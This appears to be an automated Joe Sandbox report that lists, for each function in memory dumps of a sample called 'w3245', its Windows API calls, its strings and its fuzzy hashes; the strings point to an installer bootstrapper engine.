                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                              • API String ID: 1357844191-2832335422
                                                                                                                                                              • Opcode ID: c6f5bbd432482de4e51bd2a2200e552b950ff31d52a563b4a3379fda57b6ec8a
                                                                                                                                                              • Instruction ID: a9cbc8b81c85b9bcd784aedf7269f227be32fd247f51c5929543ba872a1730e5
                                                                                                                                                              • Opcode Fuzzy Hash: c6f5bbd432482de4e51bd2a2200e552b950ff31d52a563b4a3379fda57b6ec8a
                                                                                                                                                              • Instruction Fuzzy Hash: 46C11035601696EBCB169F29C885F6A77A9FF0C310B104129FE15EB342DB78EC529BD0
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 007C4617
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C461E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 007C4628
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 007C4678
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C4682
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 007C46C6
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C46D0
                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 007C470C
                                                                                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 007C471D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C4727
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 007C477D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                              • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                              • API String ID: 2241679041-1583736410
                                                                                                                                                              • Opcode ID: 0f786fc47a8bb6db6370159088fc4b256bf918525ed271717e1ac42d4ad8fd33
                                                                                                                                                              • Instruction ID: 4aba72cf7df3d643358271893415d025e2ed08e88a75d4da21c0d98c7407e4d3
                                                                                                                                                              • Opcode Fuzzy Hash: 0f786fc47a8bb6db6370159088fc4b256bf918525ed271717e1ac42d4ad8fd33
                                                                                                                                                              • Instruction Fuzzy Hash: 6941D773A40626ABD7209BA58D5AF6F7B68FB01760F11412DFE11F6380E76D8C0086E1
                                                                                                                                                              APIs
                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 007D4F0D
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,007C452F,?), ref: 007D4F16
                                                                                                                                                              • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,007C452F,?), ref: 007D4FB8
                                                                                                                                                              • GetLastError.KERNEL32(?,007C452F,?), ref: 007D4FC5
                                                                                                                                                              • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,007C452F), ref: 007D5040
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,007C452F,?), ref: 007D504B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,007C452F,?), ref: 007D508B
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,007C452F,?), ref: 007D50B9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate full name of cache pipe: %ls, xrefs: 007D5022
                                                                                                                                                              • \\.\pipe\%ls.Cache, xrefs: 007D500C
                                                                                                                                                              • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 007D4F08
                                                                                                                                                              • \\.\pipe\%ls, xrefs: 007D4F6E
                                                                                                                                                              • Failed to allocate full name of pipe: %ls, xrefs: 007D4F84
                                                                                                                                                              • Failed to create pipe: %ls, xrefs: 007D4FF6, 007D507C
                                                                                                                                                              • Failed to create the security descriptor for the connection event and pipe., xrefs: 007D4F44
                                                                                                                                                              • pipe.cpp, xrefs: 007D4F3A, 007D4FE9, 007D506F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                              • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                              • API String ID: 1214480349-3253666091
                                                                                                                                                              • Opcode ID: 5c3471848d6e63023e61fa3254ac463ed107fb8d9d69d35b9fe08a87098219d8
                                                                                                                                                              • Instruction ID: 58a16d18962a4b949aa3baa43df168ec44f96d7c1bf27ec9e9b07b82be4b04b3
                                                                                                                                                              • Opcode Fuzzy Hash: 5c3471848d6e63023e61fa3254ac463ed107fb8d9d69d35b9fe08a87098219d8
                                                                                                                                                              • Instruction Fuzzy Hash: EE517072941625BBDB219BA4CC46F9EBB78FF04720F150126F910F6390D3B95A809AE1
                                                                                                                                                              APIs
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,007D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 007FFAC7
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFAD1
                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 007FFB0E
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFB18
                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 007FFB5F
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 007FFB83
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFB8D
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(00000000), ref: 007FFBCA
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007FFBE1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFBFC
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 007FFC34
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFC3E
                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 007FFC77
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007FFC85
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                              • String ID: cryputil.cpp
                                                                                                                                                              • API String ID: 3955742341-2185294990
                                                                                                                                                              • Opcode ID: 9128cf1f927841c1e7fdd2491f71cdc49ea71541e6eea92863b47b2282e298aa
                                                                                                                                                              • Instruction ID: aac9ab0441f126225b3887f41ad646103c5afba8880524ec448bd9e82bc31b86
                                                                                                                                                              • Opcode Fuzzy Hash: 9128cf1f927841c1e7fdd2491f71cdc49ea71541e6eea92863b47b2282e298aa
                                                                                                                                                              • Instruction Fuzzy Hash: 2851B376D4013DABE7318A658C14BEB7A64BF04751F0140B5FF48F6380EB788D809AE4
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get cached path for package with cache id: %ls, xrefs: 007D9EC8
                                                                                                                                                              • Failed to transfer working path to unverified path for payload: %ls., xrefs: 007D9FA4
                                                                                                                                                              • Failed to move verified file to complete payload path: %ls, xrefs: 007DA06C
                                                                                                                                                              • Failed to reset permissions on unverified cached payload: %ls, xrefs: 007D9FF1
                                                                                                                                                              • moving, xrefs: 007DA029
                                                                                                                                                              • Failed to concat complete cached path., xrefs: 007D9EF4
                                                                                                                                                              • Failed to create unverified path., xrefs: 007D9F6E
                                                                                                                                                              • copying, xrefs: 007DA030, 007DA038
                                                                                                                                                              • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 007D9FCB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                              • API String ID: 0-1289240508
                                                                                                                                                              • Opcode ID: 4163cc3fbf7f5debf91b375aeed4f3467d9c6a4df53ac9b4d9d387220fe995e1
                                                                                                                                                              • Instruction ID: da6cad0a2f07ed31b5619d0d8fb5f2f5c993ead5975dc8970693e1e6eb47450c
                                                                                                                                                              • Instruction Fuzzy Hash: 67516032944119FADF236BA4CD06FED7B75FF14710F140052FA10B52A1E77A9EA0AB86
                                                                                                                                                              APIs
                                                                                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 007C62F8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6302
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastVersion
                                                                                                                                                              • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 305913169-1971907631
                                                                                                                                                              • Opcode ID: 84cd44e26165c7e34fdf68ff7e93d4be728e37e2df7a42fa03859fdbde41d57e
                                                                                                                                                              • Instruction ID: 5046231407a76f679c50b49ded270dd7289c277122e688237f9b2698013eab0d
                                                                                                                                                              • Instruction Fuzzy Hash: 1741A871A01268ABDB209B59CC89FEF7BB8EB86750F10019EF545E7281D7389E41CB91
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 007C6062
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 007C6076
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6088
                                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 007C60DC
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C60E6
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate the buffer for the Date., xrefs: 007C60C4
                                                                                                                                                              • Failed to get the required buffer length for the Date., xrefs: 007C60AD
                                                                                                                                                              • Failed to get the Date., xrefs: 007C610B
                                                                                                                                                              • variable.cpp, xrefs: 007C60A3, 007C6101
                                                                                                                                                              • Failed to set variant value., xrefs: 007C6124
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                              • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2700948981-3682088697
                                                                                                                                                              • Opcode ID: 2799a66b5e8c00ceb5887b0672abdcc26d42105f24e33e2db813b036eab9d5ad
                                                                                                                                                              • Instruction ID: ab6da63c0d9b8cbf8a489110aaab55a20ce8e587269d9b7257e920f5d5ef9cbe
                                                                                                                                                              • Instruction Fuzzy Hash: CB319972A40629ABDB219BE9CC86FAF7BA4FB04711F11012DFE00F7281D6699D4146E1
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(0082B5FC,00000000,?,?,?,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFEF4
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFF04
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 007FFF0D
                                                                                                                                                              • GetLocalTime.KERNEL32(8007139F,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 007FFF23
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0082B5FC,007E12CF,?,00000000,0000FDE9,?,007E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0080001A
                                                                                                                                                              Strings
                                                                                                                                                              • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 007FFFC0
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                              • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                              • API String ID: 296830338-59366893
                                                                                                                                                              • Opcode ID: dd63ddd6dd7f2060999fdb15af5b8661f07b26e1818ed39a0ca832219155958c
                                                                                                                                                              • Instruction ID: 9e6eb8aeac83f3a011d6550277bfa1d4625052ab9a1ff41855192fc33bb82fcb
                                                                                                                                                              • Instruction Fuzzy Hash: 6A418E72D01219EBDB619FA4DC05BBEB7B9FF08B11F104025FA00E6290DB388D81DBA1
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 007D9BF2
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 007D9C19
                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D9C79
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 007D9C84
                                                                                                                                                                • Part of subcall function 007C3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C3D40
                                                                                                                                                                • Part of subcall function 007C3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3D53
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                              • String ID: *.*$.unverified
                                                                                                                                                              • API String ID: 457978746-2528915496
                                                                                                                                                              • Opcode ID: 1b758f35a0c33d1ebfeebf8c4e54777197640e8f82fe7a4b12cf5a979cb0efeb
                                                                                                                                                              • Instruction ID: e691059e262b4298b5ee6c8b6c1e9f7b05178d63544fcab8c445a7f0b60771d2
                                                                                                                                                              • Instruction Fuzzy Hash: AB41763191052CAECB61AB74DD4DBEAB7B8FF44301F5001A6E908E11A0EB799EC4DF64
                                                                                                                                                              APIs
                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008088D0
                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008088E2
                                                                                                                                                              Strings
                                                                                                                                                              • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0080892D
                                                                                                                                                              • feclient.dll, xrefs: 008088AA
                                                                                                                                                              • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008088B9
                                                                                                                                                              • crypt32.dll, xrefs: 008088A0
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                              • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                              • API String ID: 1772835396-1985132828
                                                                                                                                                              • Opcode ID: a306585503bf6d68b8a9ffcfbe800ea0cebb61a436c28fada40ed5e54c91f3c9
                                                                                                                                                              • Instruction ID: afea99da9b6f59a91a238adbe63f5d5a5c82c8cf11ba92ec719215b9b3cee7c3
                                                                                                                                                              • Instruction Fuzzy Hash: D221F8A6901128EADB60DBAADC05EBFB3FCFB4C711F10855AF955D2180E7389A90D770
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                              • Opcode ID: ae2d6a8d2affe42b813d4fa985485db7f7dcc929b3fcd5e85e42939741086253
                                                                                                                                                              • Instruction ID: ad92b5dba9cc8ff316b043d294043c66861090253d695ae3fd3936a95f860e88
                                                                                                                                                              • Opcode Fuzzy Hash: ae2d6a8d2affe42b813d4fa985485db7f7dcc929b3fcd5e85e42939741086253
                                                                                                                                                              • Instruction Fuzzy Hash: A4C228B1E0862C8BDB25CE28DD447EAB7B5EB88304F1541EAD54DE7341E778AE818F41
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastNameUser
                                                                                                                                                              • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2054405381-1522884404
                                                                                                                                                              • Opcode ID: ae06624277f624122e7f1cabb0c3470533994107dcbe18230b9ca8d12c841a8c
                                                                                                                                                              • Instruction ID: 5233bef216166e034d9a28e45ad31e64f6dfe1b3792d9b9af3af66be38eceb3e
                                                                                                                                                              • Opcode Fuzzy Hash: ae06624277f624122e7f1cabb0c3470533994107dcbe18230b9ca8d12c841a8c
                                                                                                                                                              • Instruction Fuzzy Hash: AE01D632A01629A7C7219B559C4AFAFB7A8FB04720F10026DFC14E7281DA689D405AE5
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008004F4,?,?,?,?,00000001), ref: 007FFE40
                                                                                                                                                              • GetLastError.KERNEL32(?,008004F4,?,?,?,?,00000001,?,007C5616,?,?,00000000,?,?,007C5395,00000002), ref: 007FFE4C
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008004F4,?,?,?,?,00000001,?,007C5616,?,?), ref: 007FFEB5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 1365068426-3545173039
                                                                                                                                                              • Opcode ID: 0876e51b130e1ed821556246d18647531cc6a4f1f05d46c319c966d35fe409e4
                                                                                                                                                              • Instruction ID: 0537667c2dc995c9730985f6f5a672d2d57c7ae9f1dc443f2e9fa8bffd00f2de
                                                                                                                                                              • Opcode Fuzzy Hash: 0876e51b130e1ed821556246d18647531cc6a4f1f05d46c319c966d35fe409e4
                                                                                                                                                              • Instruction Fuzzy Hash: DA118F32A0012DEBDB319F949D05EBF7B69FF54710F014069FE0496271EB358E20D6A0
                                                                                                                                                              APIs
                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007E6B32,00000000,00000003), ref: 007E6B9F
                                                                                                                                                              • GetLastError.KERNEL32(?,007E6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?), ref: 007E6BA9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set service start type., xrefs: 007E6BD7
                                                                                                                                                              • msuengine.cpp, xrefs: 007E6BCD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChangeConfigErrorLastService
                                                                                                                                                              • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                              • API String ID: 1456623077-1628545019
                                                                                                                                                              • Opcode ID: ce1bdf2d4ed12033627bde7fe0df975baaa6562491eb1004fc31c5bd90f06366
                                                                                                                                                              • Instruction ID: c3b6040ee03df7aae804466cbb192b05d8cc71cf598388aa659e02d9d5b5e1b2
                                                                                                                                                              • Opcode Fuzzy Hash: ce1bdf2d4ed12033627bde7fe0df975baaa6562491eb1004fc31c5bd90f06366
                                                                                                                                                              • Instruction Fuzzy Hash: 71F0A77764923577C62126965C09F8B7E48EF157B0B210325BD38EA2D0DA59890085E0
                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007F3D6E
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007F3D78
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 007F3D85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                              • Opcode ID: c032d8857aae06c26b1a8b5d7b75aaf624a2cb9ca8b8c1efac9eb9763a5de26e
                                                                                                                                                              • Instruction ID: 485a4105d0379e582cd49b29b01bc42fcabd97cb81aa3416644c5fd502e6bbc0
                                                                                                                                                              • Opcode Fuzzy Hash: c032d8857aae06c26b1a8b5d7b75aaf624a2cb9ca8b8c1efac9eb9763a5de26e
                                                                                                                                                              • Instruction Fuzzy Hash: 8431D27491122CABCB61DF65DD8979CBBB8BF08310F5045EAE81CA7251E7349F818F44
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
